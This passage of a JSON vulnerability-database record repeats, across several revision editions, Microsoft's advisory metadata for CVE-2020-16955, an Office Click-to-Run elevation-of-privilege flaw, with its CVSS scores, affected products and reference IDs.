"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-13T04:50:40", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-12T06:50:46", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-12T06:50:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T04:50:40", "differentElements": ["msAffectedSoftware"], "edition": 42}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-13T06:59:38", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-12T06:50:46", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-12T06:50:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T06:59:38", "differentElements": ["msAffectedSoftware"], "edition": 43}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-13T10:44:58", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-12T06:50:46", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-12T06:50:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T10:44:58", "differentElements": ["msAffectedSoftware"], "edition": 44}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-14T02:48:44", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-12T06:50:46", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-12T06:50:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T02:48:44", "differentElements": ["msAffectedSoftware"], "edition": 45}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-14T04:52:22", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-14T04:52:22", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-14T04:52:22", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T04:52:22", "differentElements": ["msAffectedSoftware"], "edition": 46}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-16T11:28:43", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-14T04:52:22", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-14T04:52:22", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T11:28:43", "differentElements": ["msAffectedSoftware"], "edition": 47}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-16T12:44:15", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-16T12:44:15", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-16T12:44:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T12:44:15", "differentElements": ["msAffectedSoftware"], "edition": 48}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-17T02:51:18", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-16T12:44:15", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-16T12:44:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T02:51:18", "differentElements": ["msAffectedSoftware"], "edition": 49}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": 